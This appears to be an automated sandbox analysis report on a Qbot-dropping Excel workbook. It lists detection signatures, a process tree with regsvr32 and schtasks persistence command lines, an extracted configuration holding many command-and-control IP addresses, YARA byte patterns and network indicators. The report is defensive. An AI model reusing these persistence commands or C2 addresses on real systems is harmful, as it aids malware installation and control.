Loading ...

Play interactive tourEdit tour

Analysis Report audit-1133808478.xlsb

Overview

General Information

Sample Name:audit-1133808478.xlsb
Analysis ID:433122
MD5:dbab0aba5ca271442b08d027f3ed391f
SHA1:0c163e79f6bffea037d225a221d0a701db03c2d0
SHA256:8987dac6f44dda69ceb74d59c276d38227e285c78f74e2d835283d1baa308176
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Schedule system process
Yara detected Qbot
Allocates memory in foreign processes
Contain functionality to detect virtual machines
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 3348 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 4272 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • regsvr32.exe (PID: 4760 cmdline: regsvr32 -s ..\covi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 4144 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • regsvr32.exe (PID: 6104 cmdline: regsvr32 -s ..\covi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 6092 cmdline: regsvr32.exe -s 'C:\Users\user\covi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3360 cmdline: -s 'C:\Users\user\covi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 4152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • regsvr32.exe (PID: 3676 cmdline: regsvr32.exe -s 'C:\Users\user\covi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3056 cmdline: -s 'C:\Users\user\covi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 5744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "tr", "Campaign": "1623225382", "Version": "402.68", "C2 list": ["190.85.91.154:443", "140.82.49.12:443", "105.198.236.101:443", "68.186.192.69:443", "24.95.61.62:443", "90.65.234.26:2222", "197.45.110.165:995", "96.61.23.88:995", "172.78.51.35:443", "184.185.103.157:443", "71.163.222.223:443", "27.223.92.142:995", "24.179.77.236:443", "97.69.160.4:2222", "188.26.91.212:443", "75.67.192.125:443", "24.152.219.253:995", "92.59.35.196:2222", "47.22.148.6:443", "216.201.162.158:443", "76.25.142.196:443", "81.97.154.100:443", "81.214.126.173:2222", "71.41.184.10:3389", "83.110.109.189:2222", "125.239.44.146:995", "144.139.47.206:443", "75.118.1.141:443", "175.136.38.142:443", "98.192.185.86:443", "67.165.206.193:993", "73.151.236.31:443", "173.21.10.71:2222", "45.46.53.140:2222", "71.74.12.34:443", "45.63.107.192:2222", "45.63.107.192:443", "45.32.211.207:443", "45.32.211.207:8443", "149.28.101.90:995", "207.246.116.237:8443", "207.246.116.237:995", "207.246.116.237:2222", "45.77.117.108:2222", "45.77.117.108:8443", "149.28.98.196:995", "149.28.101.90:443", "45.77.117.108:443", "45.32.211.207:995", "45.32.211.207:2222", "45.77.115.208:995", "149.28.98.196:2222", "207.246.77.75:995", "45.77.115.208:8443", "207.246.77.75:2222", "144.202.38.185:443", "207.246.116.237:443", "149.28.101.90:2222", "149.28.101.90:8443", "45.77.115.208:2222", "45.77.115.208:443", "45.77.117.108:995", "149.28.98.196:443", "144.202.38.185:995", "207.246.77.75:8443", "207.246.77.75:443", "144.202.38.185:2222", "98.252.118.134:443", "149.28.99.97:443", "149.28.99.97:995", "149.28.99.97:2222", "45.63.107.192:995", "189.210.115.207:443", "105.198.236.99:443", "72.252.201.69:443", "151.205.102.42:443", "86.220.62.251:2222", "75.137.47.174:443", "72.240.200.181:2222", "95.77.223.148:443", "24.55.112.61:443", "24.229.150.54:995", "109.12.111.14:443", "24.139.72.117:443", "136.232.34.70:443", "50.29.166.232:995", "92.96.3.180:2078", "71.187.170.235:443", "68.204.7.158:443", "108.27.245.228:443", "83.196.56.65:2222", "50.244.112.106:443", "96.37.113.36:993", "24.122.166.173:443", "73.25.124.140:2222", "86.173.143.211:443", "47.196.213.73:443", "186.154.175.13:443", "70.163.161.79:443", "78.63.226.32:443", "195.6.1.154:2222", "76.168.147.166:993", "64.121.114.87:443", "77.27.207.217:995", "31.4.242.233:995", "125.62.192.220:443", "195.12.154.8:443", "71.117.132.169:443", "96.21.251.127:2222", "71.199.192.62:443", "70.168.130.172:995", "82.12.157.95:995", "209.210.187.52:995", "209.210.187.52:443", "67.6.12.4:443", "189.222.59.177:443", "174.104.22.30:443", "142.117.191.18:2222", "189.146.183.105:443", "213.60.147.140:443", "196.221.207.137:995", "108.46.145.30:443", "187.250.238.164:995", "2.7.116.188:2222", "195.43.173.70:443", "106.250.150.98:443", "45.67.231.247:443", "83.110.103.152:443", "83.110.9.71:2222", "78.97.207.104:443", "59.90.246.200:443", "80.227.5.69:443", "125.63.101.62:443", "86.236.77.68:2222", "109.106.69.138:2222", "84.72.35.226:443", "217.133.54.140:32100", "197.161.154.132:443", "89.137.211.239:995", "74.222.204.82:995", "122.148.156.131:995", "156.223.110.23:443", "144.139.166.18:443", "202.185.166.181:443", "76.94.200.148:995", "71.63.120.101:443", "196.151.252.84:443", "202.188.138.162:443", "74.68.144.202:443", "69.58.147.82:2078"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmpQakBotQakBot Payloadkevoreilly
      • 0x1239d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
      00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
        00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmpQakBotQakBot Payloadkevoreilly
        • 0x12f9d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.explorer.exe.f50000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          4.2.explorer.exe.f50000.0.unpackQakBotQakBot Payloadkevoreilly
          • 0x1239d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
          4.2.explorer.exe.f50000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
            4.2.explorer.exe.f50000.0.raw.unpackQakBotQakBot Payloadkevoreilly
            • 0x12f9d:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
            3.2.regsvr32.exe.bd0000.2.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
              Click to see the 3 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\covi1.dll, CommandLine: regsvr32 -s ..\covi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3348, ProcessCommandLine: regsvr32 -s ..\covi1.dll, ProcessId: 4760

              Persistence and Installation Behavior:

              barindex
              Sigma detected: Schedule system processShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5828, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16, ProcessId: 4144

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 4.2.explorer.exe.f50000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "tr", "Campaign": "1623225382", "Version": "402.68", "C2 list": ["190.85.91.154:443", "140.82.49.12:443", "105.198.236.101:443", "68.186.192.69:443", "24.95.61.62:443", "90.65.234.26:2222", "197.45.110.165:995", "96.61.23.88:995", "172.78.51.35:443", "184.185.103.157:443", "71.163.222.223:443", "27.223.92.142:995", "24.179.77.236:443", "97.69.160.4:2222", "188.26.91.212:443", "75.67.192.125:443", "24.152.219.253:995", "92.59.35.196:2222", "47.22.148.6:443", "216.201.162.158:443", "76.25.142.196:443", "81.97.154.100:443", "81.214.126.173:2222", "71.41.184.10:3389", "83.110.109.189:2222", "125.239.44.146:995", "144.139.47.206:443", "75.118.1.141:443", "175.136.38.142:443", "98.192.185.86:443", "67.165.206.193:993", "73.151.236.31:443", "173.21.10.71:2222", "45.46.53.140:2222", "71.74.12.34:443", "45.63.107.192:2222", "45.63.107.192:443", "45.32.211.207:443", "45.32.211.207:8443", "149.28.101.90:995", "207.246.116.237:8443", "207.246.116.237:995", "207.246.116.237:2222", "45.77.117.108:2222", "45.77.117.108:8443", "149.28.98.196:995", "149.28.101.90:443", "45.77.117.108:443", "45.32.211.207:995", "45.32.211.207:2222", "45.77.115.208:995", "149.28.98.196:2222", "207.246.77.75:995", "45.77.115.208:8443", "207.246.77.75:2222", "144.202.38.185:443", "207.246.116.237:443", "149.28.101.90:2222", "149.28.101.90:8443", "45.77.115.208:2222", "45.77.115.208:443", "45.77.117.108:995", "149.28.98.196:443", "144.202.38.185:995", "207.246.77.75:8443", "207.246.77.75:443", "144.202.38.185:2222", "98.252.118.134:443", "149.28.99.97:443", "149.28.99.97:995", "149.28.99.97:2222", "45.63.107.192:995", "189.210.115.207:443", "105.198.236.99:443", "72.252.201.69:443", "151.205.102.42:443", "86.220.62.251:2222", "75.137.47.174:443", "72.240.200.181:2222", "95.77.223.148:443", "24.55.112.61:443", "24.229.150.54:995", "109.12.111.14:443", "24.139.72.117:443", "136.232.34.70:443", "50.29.166.232:995", "92.96.3.180:2078", "71.187.170.235:443", "68.204.7.158:443", "108.27.245.228:443", "83.196.56.65:2222", "50.244.112.106:443", "96.37.113.36:993", "24.122.166.173:443", "73.25.124.140:2222", "86.173.143.211:443", "47.196.213.73:443", "186.154.175.13:443", "70.163.161.79:443", "78.63.226.32:443", "195.6.1.154:2222", "76.168.147.166:993", "64.121.114.87:443", "77.27.207.217:995", "31.4.242.233:995", "125.62.192.220:443", "195.12.154.8:443", "71.117.132.169:443", "96.21.251.127:2222", "71.199.192.62:443", "70.168.130.172:995", "82.12.157.95:995", "209.210.187.52:995", "209.210.187.52:443", "67.6.12.4:443", "189.222.59.177:443", "174.104.22.30:443", "142.117.191.18:2222", "189.146.183.105:443", "213.60.147.140:443", "196.221.207.137:995", "108.46.145.30:443", "187.250.238.164:995", "2.7.116.188:2222", "195.43.173.70:443", "106.250.150.98:443", "45.67.231.247:443", "83.110.103.152:443", "83.110.9.71:2222", "78.97.207.104:443", "59.90.246.200:443", "80.227.5.69:443", "125.63.101.62:443", "86.236.77.68:2222", "109.106.69.138:2222", "84.72.35.226:443", "217.133.54.140:
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htmJoe Sandbox ML: detected
              Source: C:\Users\user\covi1.dllJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: unknownHTTPS traffic detected: 43.225.55.182:443 -> 192.168.2.3:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 192.185.33.154:443 -> 192.168.2.3:49723 version: TLS 1.2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5AEE4 FindFirstFileW,FindNextFileW,

              Software Vulnerabilities:

              barindex
              Document exploit detected (creates forbidden files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\covi1.dllJump to behavior
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: pt[1].htm.0.drJump to dropped file
              Document exploit detected (UrlDownloadToFile)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
              Source: global trafficDNS query: name: shadiinfo.com
              Source: global trafficTCP traffic: 192.168.2.3:49720 -> 43.225.55.182:443
              Source: global trafficTCP traffic: 192.168.2.3:49720 -> 43.225.55.182:443
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS traffic detected: queries for: shadiinfo.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.aadrm.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.cortana.ai
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.office.net
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.onedrive.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://augloop.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cdn.entity.
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://clients.config.office.net/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://config.edge.skype.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cortana.ai
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cortana.ai/api
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://cr.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dev.cortana.ai
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://devnull.onenote.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://directory.services.
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://graph.windows.net
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://graph.windows.net/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://lifecycle.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://login.windows.local
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://management.azure.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://management.azure.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://messaging.office.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ncus.contentsync.
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
